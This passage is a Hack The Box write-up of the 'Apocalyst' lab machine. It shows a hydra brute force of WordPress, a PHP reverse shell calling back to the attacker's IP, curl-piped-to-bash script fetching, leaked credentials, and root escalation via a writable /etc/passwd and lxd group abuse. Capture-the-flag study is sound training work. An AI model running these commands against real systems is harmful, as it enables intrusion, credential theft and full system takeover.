[07:49:52] 200 - 157B - /make/ [07:49:52] 200 - 157B - /given/ [07:49:52] 200 - 157B - /branding/ [07:49:52] 200 - 157B - /fulfilled/ [07:49:52] 200 - 157B - /build/ [07:49:52] 200 - 157B - /needs/ [07:49:52] 200 - 157B - /pictures/ [07:49:52] 200 - 157B - /long/ [07:49:52] 200 - 157B - /Orthodox/ [07:49:52] 200 - 157B - /bowl/ [07:49:52] 200 - 157B - /end/ [07:49:52] 200 - 157B - /describe/ [07:49:52] 200 - 157B - /either/ [07:49:52] 200 - 157B - /generally/ [07:49:52] 200 - 157B - /must/ [07:49:52] 200 - 157B - /half/ [07:49:52] 200 - 157B - /suffering/
Task Completed
Again, there are a bunch of folders, but the folder Rightiousness has a different size.
u505@kali:~/HTB/Machines/Apocalyst$ curl http://apocalyst.htb/Rightiousness/
<!doctype html>
<br>
<html lang="en">
<head>
<meta charset="utf-8">
<br>
<title>End of the world</title>
</head>
<br>
<body>
<img src="image.jpg">
<!-- needle -->
</body>
</html>
u505@kali:~/HTB/Machines/Apocalyst$ wget http://apocalyst.htb/Rightiousness/image.jpg --2020-05-12 07:51:40-- http://apocalyst.htb/Rightiousness/image.jpg Resolving apocalyst.htb (apocalyst.htb)... 10.10.10.46 Connecting to apocalyst.htb (apocalyst.htb)|10.10.10.46|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 215541 (210K) [image/jpeg] Saving to: ‘image.jpg.1’
image.jpg.1 100%[===================>] 210.49K 1.17MB/s in 0.2s
2020-05-12 07:51:40 (1.17 MB/s) - ‘image.jpg.1’ saved [215541/215541]
u505@kali:~/HTB/Machines/Apocalyst$ steghide info image.jpg.1
"image.jpg.1":
format: jpeg
capacity: 13.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "list.txt":
size: 3.6 KB
encrypted: rijndael-128, cbc
compressed: yes
This time the downloaded image has hidden data.
u505@kali:~/HTB/Machines/Apocalyst$ steghide extract -sf image.jpg.1
Enter passphrase:
wrote extracted data to "list.txt".
Brute force wordpress admin login
We try a login with the user falaraki to intercept the HTTP request.
POST /wp-login.php HTTP/1.1 Host: apocalyst.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://apocalyst.htb/wp-login.php Content-Type: application/x-www-form-urlencoded Content-Length: 108 Connection: close Cookie: wordpress_test_cookie=WP+Cookie+check Upgrade-Insecure-Requests: 1
log=falaraki&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1
We intercept the response to intercept the error message.
The password you entered for the username <strong>falaraki</strong> is incorrect.
With this information, hydra will brute force the login page.
u505@kali:~/HTB/Machines/Apocalyst$ hydra -l falaraki -P list.txt "http-post-form://apocalyst.htb/wp-login.php:log=falaraki&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:The password you entered for the username <strong>falaraki</strong> is incorrect." Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-12 15:26:27 [DATA] max 16 tasks per 1 server, overall 16 tasks, 486 login tries (l:1/p:486), ~31 tries per task [DATA] attacking http-post-form://apocalyst.htb:80/wp-login.php:log=falaraki&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:The password you entered for the username <strong>falaraki</strong> is incorrect. [80][http-post-form] host: apocalyst.htb login: falaraki password: Transclisiation 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-12 15:26:55
Hydra finds the password from the list and we gain access to the admin portal.
Reverse shell
u505@kali:~/HTB/Machines/Apocalyst$ cp /usr/share/webshells/php/php-reverse-shell.php ./
We prepare our reverse shell script.
u505@kali:~/HTB/Machines/Apocalyst$ grep CHANGE php-reverse-shell.php $ip = '10.10.14.28'; // CHANGE THIS $port = 4444; // CHANGE THIS
We turn on the listener.
u505@kali:~/HTB/Machines/Apocalyst$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
We inject our reverse shell php code in the index.php page.
u505@kali:~/HTB/Machines/Apocalyst$ curl http://apocalyst.htb/
The call at the main page triggers the reverse shell.
u505@kali:~/HTB/Machines/Apocalyst$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.46. Ncat: Connection from 10.10.10.46:39290. Linux apocalyst 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 20:55:09 up 31 min, 0 users, load average: 0.00, 0.00, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" /bin/sh: 1: python: not found $ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@apocalyst:/$ stty raw -echo stty raw -echo
User Flag
The user flag is available from www-data.
www-data@apocalyst:/$ cat /home/falaraki/user.txt <USER_FLAG>
Enumeration
Mysql enumeration
www-data@apocalyst:/var/www/html/apocalyst.htb$ cat wp-config.php
...
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp_myblog');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'Th3SoopaD00paPa5S!');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', );
...
www-data@apocalyst:/var/www/html/apocalyst.htb$ mysql -p -u root Enter password: Th3SoopaD00paPa5S!
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 804 Server version: 5.7.19-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | sys | | wp_myblog | +--------------------+ 5 rows in set (0.01 sec) use wp_myblog; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed
No new information is found on the database.
LinEnum as www-data
u505@kali:~/HTB/Machines/Apocalyst$ mkdir www u505@kali:~/HTB/Machines/Apocalyst$ cd www/ u505@kali:~/HTB/Machines/Apocalyst/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/Apocalyst/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
www-data@apocalyst:/var/www/html/apocalyst.htb$ curl http://10.10.14.28/LinEnum.sh | bash ... [-] It looks like we have some admin users: uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm) uid=1000(falaraki) gid=1000(falaraki) groups=1000(falaraki),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) ... [-] Files not owned by user but writable by group: -rw-rw-rw- 1 root root 1681 May 12 21:40 /etc/passwd ... [-] Accounts that have recently used sudo: /home/falaraki/.sudo_as_admin_successful
pspy
u505@kali:~/HTB/Machines/Apocalyst/www$ cp /opt/utils/pspy/pspy64 ./ u505@kali:~/HTB/Machines/Apocalyst/www$ sudo python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
www-data@apocalyst:/tmp$ wget http://10.10.14.28/pspy64 --2020-05-12 21:13:41-- http://10.10.14.28/pspy64 Connecting to 10.10.14.28:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3078592 (2.9M) [application/octet-stream] Saving to: 'pspy64'
pspy64 100%[===================>] 2.94M 3.87MB/s in 0.8s
2020-05-12 21:13:41 (3.87 MB/s) - 'pspy64' saved [3078592/3078592] www-data@apocalyst:/tmp$ chmod +x pspy64 www-data@apocalyst:/tmp$ ./pspy64
We don't find any cron job on the server.
Hidden user file
www-data@apocalyst:/home/falaraki$ ls -la ls -la total 44 drwxr-xr-x 4 falaraki falaraki 4096 Jul 27 2017 . drwxr-xr-x 3 root root 4096 Jul 26 2017 .. -rw------- 1 falaraki falaraki 516 Jul 27 2017 .bash_history -rw-r--r-- 1 falaraki falaraki 220 Jul 26 2017 .bash_logout -rw-r--r-- 1 falaraki falaraki 3771 Jul 26 2017 .bashrc drwx------ 2 falaraki falaraki 4096 Jul 26 2017 .cache drwxrwxr-x 2 falaraki falaraki 4096 Jul 26 2017 .nano -rw-r--r-- 1 falaraki falaraki 655 Jul 26 2017 .profile -rw-rw-r-- 1 falaraki falaraki 109 Jul 26 2017 .secret -rw-r--r-- 1 falaraki falaraki 0 Jul 26 2017 .sudo_as_admin_successful -rw-r--r-- 1 root root 1024 Jul 27 2017 .wp-config.php.swp -rw-rw-r-- 1 falaraki falaraki 33 Jul 26 2017 user.txt
There is an hidden file.
www-data@apocalyst:/home/falaraki$ cat .secret
cat .secret
S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M=
www-data@apocalyst:/home/falaraki$ base64 -d .secret
base64 -d .secret
Keep forgetting password so this will keep it safe!
Y0uAINtG37TiNgTH!sUzersP4ss</span|
We find falaraki password.
www-data@apocalyst:/home/falaraki$ su - falaraki su - falaraki Password: Y0uAINtG37TiNgTH!sUzersP4ss falaraki@apocalyst:~$ sudo -l sudo -l [sudo] password for falaraki: Y0uAINtG37TiNgTH!sUzersP4ss
Sorry, user falaraki may not run sudo on apocalyst.
I expected access to sudo, because of the sudo flag. But it seems that user falaraki doesn't have sudo rights anymore.
LinEnum as falaraki
falaraki@apocalyst:~$ curl http://10.10.14.28/LinEnum.sh | bash
...
[-] Files not owned by user but writable by group:
-rw-rw-rw- 1 root root 1681 May 12 21:40 /etc/passwd
...
[-] Can we read/write sensitive files:
-rw-rw-rw- 1 root root 1681 May 12 21:40 /etc/passwd
-rw-r--r-- 1 root root 830 Jul 27 2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
-rw-r----- 1 root shadow 1070 Jul 26 2017 /etc/shadow
...
[+] We're a member of the (lxd) group - could possibly misuse these rights!
uid=1000(falaraki) gid=1000(falaraki) groups=1000(falaraki),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Adding to the /etc/passwd writable file, we find that user falaraki is member of linux containers administrator.
Falaraki's bash_history
falaraki@apocalyst:~$ cat .bash_history cat .bash_history ifconfig su root sudo su su root exit sudo su exit nano /etc/rc.local car /etc/rc.local cat /etc/rc.local nano /etc/rc.local ifconfig init 6 nano /etc/rc.local su root cd /var/www/html/ ls cd Rightiousness/ ls nano index.html ps sudo su su root cd ~ ls rm -fr setup/ ls exit su root pwd touch user.txt nano user.txt ls nano .secret ls -la rm .secret ls nano .secret su root ls -la /etc/rc.local su root id sudo nano su root exit sudo -i sudo ping google.co, sudo su sudo nano exit ls -la /etc/passwd exit
Escalation of privileges
Change falaraki user id
We know the password of falaraki, so we can change the user id in the /etc/passwd file
falaraki@apocalyst:/tmp$ sed 's/1000/0/g' /etc/passwd > passwd falaraki@apocalyst:/tmp$ cp passwd /etc/passwd falaraki@apocalyst:/tmp$ id uid=1000 gid=1000(falaraki) groups=1000(falaraki),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) falaraki@apocalyst:/tmp$ exit logout www-data@apocalyst:/$ su - falaraki Password: Y0uAINtG37TiNgTH!sUzersP4ss root@apocalyst:~# id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) root@apocalyst:~# cat /root/root.txt <ROOT_FLAG>
Alternative add new root user
The file /etc/passwd is world writable, we don't even need to know falaraki password to add a root user.
www-data@apocalyst:/$ echo "u505:`openssl passwd hello`:0:0:root:/root:/bin/bash" >> /etc/passwd www-data@apocalyst:/$ grep u505 /etc/passwd u505:zLlAdqns..VZI:0:0:root:/root:/bin/bash www-data@apocalyst:/$ su - u505 Password: hello
root@apocalyst:/# id uid=0(root) gid=0(root) groups=0(root)
Alternative abuse lxd group privileges
The user falaraki is memeber of the group lxd.
u505@kali:~/HTB/Machines/Apocalyst$ searchsploit -m 46978
Exploit: Ubuntu 18.04 - 'lxd' Privilege Escalation
URL: https://www.exploit-db.com/exploits/46978
Path: /usr/share/exploitdb/exploits/linux/local/46978.sh
File Type: Bourne-Again shell script, UTF-8 Unicode text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Apocalyst/46978.sh
u505@kali:~/HTB/Machines/Apocalyst$ dos2unix 46978.sh
dos2unix: converting file 46978.sh to Unix format...
First, we download the container script creation.
u505@kali:~/HTB/Machines/Apocalyst$ wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine --2020-05-13 07:33:04-- https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 7498 (7.3K) [text/plain] Saving to: ‘build-alpine’
build-alpine 100%[===================>] 7.32K --.-KB/s in 0s
2020-05-13 07:33:04 (25.0 MB/s) - ‘build-alpine’ saved [7498/7498]
Container creation.
u505@kali:~/HTB/Machines/Apocalyst$ sudo ./build-alpine Determining the latest release... v3.11 Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.11/main/x86_64 Downloading alpine-mirrors-3.5.10-r0.apk tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' Downloading alpine-keys-2.1-r2.apk tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' Downloading apk-tools-static-2.10.5-r0.apk tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK Verified OK Selecting mirror http://dl-3.alpinelinux.org/alpine/v3.11/main fetch http://dl-3.alpinelinux.org/alpine/v3.11/main/x86_64/APKINDEX.tar.gz (1/19) Installing musl (1.1.24-r2) (2/19) Installing busybox (1.31.1-r9) Executing busybox-1.31.1-r9.post-install (3/19) Installing alpine-baselayout (3.2.0-r3) Executing alpine-baselayout-3.2.0-r3.pre-install Executing alpine-baselayout-3.2.0-r3.post-install (4/19) Installing openrc (0.42.1-r2) Executing openrc-0.42.1-r2.post-install (5/19) Installing alpine-conf (3.8.3-r6) (6/19) Installing libcrypto1.1 (1.1.1g-r0) (7/19) Installing libssl1.1 (1.1.1g-r0) (8/19) Installing ca-certificates-cacert (20191127-r1) (9/19) Installing libtls-standalone (2.9.1-r0) (10/19) Installing ssl_client (1.31.1-r9) (11/19) Installing zlib (1.2.11-r3) (12/19) Installing apk-tools (2.10.5-r0) (13/19) Installing busybox-suid (1.31.1-r9) (14/19) Installing busybox-initscripts (3.2-r2) Executing busybox-initscripts-3.2-r2.post-install (15/19) Installing scanelf (1.2.4-r0) (16/19) Installing musl-utils (1.1.24-r2) (17/19) Installing libc-utils (0.7.2-r0) (18/19) Installing alpine-keys (2.1-r2) (19/19) Installing alpine-base (3.11.6-r0) Executing busybox-1.31.1-r9.trigger OK: 8 MiB in 19 packages u505@kali:~/HTB/Machines/Apocalyst$ cp alpine.tar.tgz www/ u505@kali:~/HTB/Machines/Apocalyst$ cd www/ u505@kali:~/HTB/Machines/Apocalyst/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the target, we download the container as falaraki.
falaraki@apocalyst:~$ id
uid=1000(falaraki) gid=1000(falaraki) groups=1000(falaraki),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
falaraki@apocalyst:~$ cd /tmp
falaraki@apocalyst:/tmp$ wget -q http://10.10.14.28/alpine.tar.tgz
Image import
falaraki@apocalyst:/tmp$ lxc image import alpine.tar.tgz --alias alpine Image imported with fingerprint: 7decf8d82cdc1bf6d4ae96ae60b738aa392254d5c9c4fd8fef66507a5766e80a falaraki@apocalyst:/tmp$ lxc image list +--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE | +--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+ | alpine | 7decf8d82cdc | no | alpine v3.11 (20200513_07:37) | x86_64 | 3.08MB | May 13, 2020 at 11:55am (UTC) | +--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
Container creation from image
falaraki@apocalyst:/tmp$ lxc init alpine privesc -c security.privileged=true Creating privesc
Container configuration mapping host root folder.
falaraki@apocalyst:/tmp$ lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true Device giveMeRoot added to privesc
We start the container
falaraki@apocalyst:/tmp$ lxc start privesc
falaraki@apocalyst:/tmp$ lxc exec privesc /bin/sh
~ # df -h
df -h
Filesystem Size Used Available Use% Mounted on
/dev/mapper/apocalyst--vg-root
3.4G 1.9G 1.3G 59% /
none 492.0K 0 492.0K 0% /dev
udev 980.6M 0 980.6M 0% /dev/fuse
udev 980.6M 0 980.6M 0% /dev/net/tun
/dev/mapper/apocalyst--vg-root
3.4G 1.9G 1.3G 59% /dev/lxd
/dev/mapper/apocalyst--vg-root
3.4G 1.9G 1.3G 59% /mnt/root
udev 980.6M 0 980.6M 0% /mnt/root/dev
tmpfs 1000.2M 0 1000.2M 0% /mnt/root/dev/shm
tmpfs 200.0M 5.9M 194.1M 3% /mnt/root/run
tmpfs 5.0M 0 5.0M 0% /mnt/root/run/lock
tmpfs 200.0M 0 200.0M 0% /mnt/root/run/user/1000
tmpfs 1000.2M 0 1000.2M 0% /mnt/root/sys/fs/cgroup
/dev/sda1 471.6M 56.8M 390.4M 13% /mnt/root/boot
/dev/mapper/apocalyst--vg-root
3.4G 1.9G 1.3G 59% /mnt/root/var/lib/lxd/shmounts
/dev/mapper/apocalyst--vg-root
3.4G 1.9G 1.3G 59% /dev/.lxd-mounts
tmpfs 200.0M 36.0K 200.0M 0% /run
We have full access of the host disk as root mounted on folder /mnt/root
~ # cat /mnt/root/root/root.txt cat /mnt/root/root/root.txt <ROOT_FLAG> ~ # exit
Once we access the files, we stop and delete the container and image.
falaraki@apocalyst:/tmp$ lxc stop privesc falaraki@apocalyst:/tmp$ lxc delete privesc falaraki@apocalyst:/tmp$ lxc image delete alpine
References
- https://www.hackingarticles.in/wordpress-reverse-shell/
- https://reboare.github.io/lxd/lxd-escape.html
- Ubuntu 18.04 - 'lxd' Privilege Escalation
Daniel Simao 15:22, 13 May 2020 (EDT)
